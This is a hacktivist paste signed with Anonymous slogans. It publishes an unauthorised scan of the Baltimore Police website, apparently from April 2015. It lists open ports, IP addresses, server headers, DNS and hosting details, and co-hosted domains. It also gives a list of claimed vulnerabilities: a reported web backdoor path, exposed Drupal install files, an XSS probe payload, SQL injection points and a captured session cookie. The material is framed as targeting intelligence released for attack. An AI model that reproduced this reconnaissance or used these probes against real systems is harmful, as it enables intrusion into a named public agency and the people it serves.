We are Anonymous
We are Legion
We do not ForGive
We do not ForGet
Expect us..
 
Rise of The Hacktivist....
 
Pentest of baltimorepolice.org @ 78% >>> Enjoy :))  #Lulz
 
 
http://www.baltimorepolice.org/
-----------------------------
 
Server Type:  nginx
-
IP Address: 23.253.170.199
 
scan report for www.baltimorepolice.org (23.253.170.199)
Host is up (0.071s latency).
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  open     https
-------------------------/
 
Name Servers
============/
 
ns87.worldnic.com:   207.204.40.144
-
 scan report for 207.204.40.144
Host is up (0.035s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
80/tcp   open     http
----
 
ns88.worldnic.com:   207.204.21.144
-
scan report for 207.204.21.144
Host is up (0.0078s latency).
PORT     STATE    SERVICE
80/tcp   open     http
-----------------------/
 
HTTP Headers for www.baltimorepolice.org
=========================================/
 
HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Language: en
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 28 Apr 2015 19:05:12 GMT
Server: nginx
X-Drupal-Cache: HIT
X-Generator: Drupal 7 (http://drupal.org)
X-Pantheon-Endpoint: 36234664-8913-4aec-b6dd-0dd1f4642920
X-Pantheon-Styx-Hostname: styxf9257755
X-Powered-By: PHP/5.3.29
X-Styx-Build-Date: Tue Apr 28 03:42:27 UTC 2015
X-Styx-Build-Num: 942
X-Styx-Build-Sha: fd514102420d3e89eba15e69540af0a692649330
X-Styx-Req-Id: styx-f920cfb93db3f8f058d581ab467bdf8b
X-Styx-Version: StyxGo
Date: Wed, 29 Apr 2015 15:55:41 GMT
X-Varnish: 2782104623 2761980092
Age: 74982
Via: 1.1 varnish
Connection: close
Vary: Accept-Encoding, Cookie, Cookie
X-Pre-Strip-Debug:
Location:
==============================================================/
 
http://www.baltimorepolice.org/robots.txt
----------------------------------------/
 
#
# robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
====================================================================/
 
EXPLOITS: to www.baltimorepolice.org.
=====================================/
 
A web backdoor was found at: "http://www.baltimorepolice.org/user/locus.php"; this could indicate that the server was hacked.
 
GET http://www.baltimorepolice.org/user/locus.php HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/CHANGELOG.txt". Vulnerability description: "A changelog was found.
 
GET http://www.baltimorepolice.org/CHANGELOG.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.mysql.txt". Vulnerability description: "Drupal installation file found."
 
GET http://www.baltimorepolice.org/INSTALL.mysql.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.pgsql.txt". Vulnerability description: "Drupal installation file found."
 
GET http://www.baltimorepolice.org/INSTALL.pgsql.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/xmlrpc.php". Vulnerability description: "xmlrpc.php was found.
 
GET http://www.baltimorepolice.org/xmlrpc.php HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/LICENSE.txt". Vulnerability description: "License file found may identify site software."
 
GET http://www.baltimorepolice.org/LICENSE.txt HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/install.php". Vulnerability description: "Drupal install.php file found.".
 
GET http://www.baltimorepolice.org/install.php HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/UPGRADE.txt". Vulnerability description: "Default file found.".
 
GET http://www.baltimorepolice.org/UPGRADE.txt HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.txt". Vulnerability description: "Default file found."
 
GET http://www.baltimorepolice.org/INSTALL.txt HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?topic=<script>alert(document.cookie)</script>%20". Vulnerability description:
 
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?SqlQuery=test%20". Vulnerability description:
 
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?pymembs=admin". Vulnerability description:
 
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?IDAdmin=test". Vulnerability description:
 
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?base=test%20". Vulnerability description:
 
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/user/". Vulnerability description: "This might be interesting.
 
GET http://www.baltimorepolice.org/user/ HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/sitemap.xml". Vulnerability description: "This gives a nice listing of the site content."
 
GET http://www.baltimorepolice.org/sitemap.xml HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?module=My_eGallery". Vulnerability description: "My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection."
 
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/web.config". Vulnerability description: "ASP config file found.".
 
GET http://www.baltimorepolice.org/web.config HTTP/1.1
Host: www.baltimorepolice.org
----/
"X-Powered-By" header for this HTTP server is: "PHP/5.3.29"
--/
The URL "http://www.baltimorepolice.org/" has the following allowed methods: *, GET, HEAD, POST.
--/
The server header for the remote web server is: "nginx"
--/
The target site *has* a DNS wildcard configuration
--
The contents of http://23.253.170.199 differ from the contents of http://www.baltimorepolice.org
--/
The remote web server seems to have a reverse proxy installed.
--/
Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application
 
GET http://www.baltimorepolice.org HTTP/1.1
Host: www.baltimorepolice.org
----/
[Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application
 
GET http://www.baltimorepolice.org/install.php HTTP/1.1
Host: www.baltimorepolice.org
----/
Found 2 URLs and 11 different points of injection. SQL
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="en-US")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="ru")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="zh-TW")
--/
 http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="en-US")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="ru")
--/
 http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="en-US")
--
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="ru")
--
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-XQlBj...", form_id="search_blo...")
 
=====================================================================/
[*]      CNAME www.baltimorepolice.org live-baltopd.pantheon.io
[*]      CNAME live-baltopd.pantheon.io styx-01.pantheon.io
[*]      A styx-01.pantheon.io 23.253.170.199
[*]      A styx-01.pantheon.io 192.237.244.66
[*]      A styx-01.pantheon.io 23.253.58.7
[*]      CNAME www.baltimorepolice.org live-baltopd.pantheon.io
[*]      CNAME live-baltopd.pantheon.io styx-01.pantheon.io
[*]      AAAA styx-01.pantheon.io 2001:4801:7825:101:be76:4eff:fe11:8f4f
[*]      AAAA styx-01.pantheon.io 2001:4801:7822:101:be76:4eff:fe10:959b
[*]      AAAA styx-01.pantheon.io 2001:4801:7824:102:be76:4eff:fe10:8f3a
======================================================================/
 
-----   www.baltimorepolice.org   -----
 
 
Host's addresses:
__________________
 
styx-01.pantheon.io                      5        IN    A        23.253.170.199
styx-01.pantheon.io                      5        IN    A        192.237.244.66
styx-01.pantheon.io                      5        IN    A        23.253.58.7
========================================================================/
 
23.253.170.199
 
17 site(s) hosted on ip 23.253.170.199
Location:   San Antonio,United States
 
    eaglecreek.com
    baltimorepolice.org
    perc.org
    the200acres.com
    goldmanprize.org
    servicesource.com
    newstatesman.com
    equalityontrial.com
    homeperformance.org
    hobostrom.com
    colt.net
    bpihomeowner.org
    insideclimatenews.org
    iescustomstaffing.com
    cdobs.com
    what-is-fracking.com
    revealnews.org
=================================================================/
 
Testing SSL server 23.253.170.199 on port 443
---------------------------------------------
 
Accepted  TLSv1  256 bits  AES256-SHA
-
Accepted  TLSv1  128 bits  AES128-SHA
-
Accepted  TLSv1  168 bits  DES-CBC3-SHA
-
 
Prefered Server Cipher(s):
    TLSv1  128 bits  AES128-SHA
 
  SSL Certificate:
    Version: 2
    Serial Number: -4294967295
    Signature Algorithm: sha256WithRSAEncryption
    Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
    Not valid before: Sep 18 00:00:00 2014 GMT
    Not valid after: Nov 25 12:00:00 2015 GMT
    Subject: /C=US/ST=California/L=San Francisco/O=Pantheon Systems, Inc./CN=*.pantheon.io
    Public Key Algorithm: rsaEncryption
    RSA Public Key: (2048 bit)
      Modulus (2048 bit):
          00:e7:e0:cb:4f:d8:3c:4c:33:f0:b4:2d:2a:99:b2:
          ff:9b:94:a3:75:60:e8:73:45:0c:3d:73:ff:31:a4:
          54:f7:13:08:2e:0e:76:7a:ce:7f:50:4a:05:3c:fe:
          61:3b:37:30:78:32:47:45:29:48:4d:69:c6:b8:d9:
          56:1f:a9:02:f3:3f:43:45:d5:2e:ff:3b:d3:73:60:
          f8:b1:45:e7:bb:ba:a3:60:c1:e0:d1:68:e2:e5:92:
          04:45:32:3f:a1:b9:1c:65:3c:ba:fa:43:31:c4:03:
          5a:d8:42:f5:41:1e:04:d1:e9:b2:93:49:ff:ca:09:
          a3:07:34:da:ab:44:85:29:d2:20:c0:58:60:e2:3b:
          f9:04:cd:50:90:20:f4:bf:55:f7:c3:ac:93:ec:fd:
          02:b7:78:39:e5:b7:92:82:f5:45:e5:56:a0:15:e5:
          2e:b0:d2:b5:96:c9:82:03:be:b4:22:a9:e4:f9:8a:
          0e:34:c7:5f:a4:33:64:6a:8f:5f:25:44:65:73:93:
          9a:9e:a6:4d:86:1f:7d:d8:a3:96:13:7d:f3:05:1e:
          39:a2:86:2f:c9:3a:58:02:94:00:48:6d:f3:9f:af:
          d7:7d:01:c4:0a:5f:57:5c:a6:b0:fe:af:6c:69:be:
          47:eb:9b:82:ba:f7:65:2e:1a:51:02:2e:ab:dd:ff:
          a4:a9
      Exponent: 65537 (0x10001)
    X509v3 Extensions:
      X509v3 Authority Key Identifier:
        keyid:0F:80:61:1C:82:31:61:D5:2F:28:E7:8D:46:38:B4:2C:E1:C6:D9:E2
 
      X509v3 Subject Key Identifier:
        53:89:42:63:7A:53:86:B9:25:90:BA:DE:C6:77:0A:E6:4F:70:DF:8E
      X509v3 Subject Alternative Name:
        DNS:*.pantheon.io, DNS:pantheon.io, DNS:*.gotpantheon.com, DNS:gotpantheon.com, DNS:*.getpantheon.com, DNS:getpantheon.com
      X509v3 Key Usage: critical
        Digital Signature, Key Encipherment
      X509v3 Extended Key Usage:
        TLS Web Server Authentication, TLS Web Client Authentication
      X509v3 CRL Distribution Points:
        URI:http://crl3.digicert.com/ssca-sha2-g3.crl
        URI:http://crl4.digicert.com/ssca-sha2-g3.crl
 
      X509v3 Certificate Policies:
        Policy: 2.16.840.1.114412.1.1
          CPS: https://www.digicert.com/CPS
 
      Authority Information Access:
        OCSP - URI:http://ocsp.digicert.com
        CA Issuers - URI:http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt
 
      X509v3 Basic Constraints: critical
        CA:FALSE
 
=============================================================================================//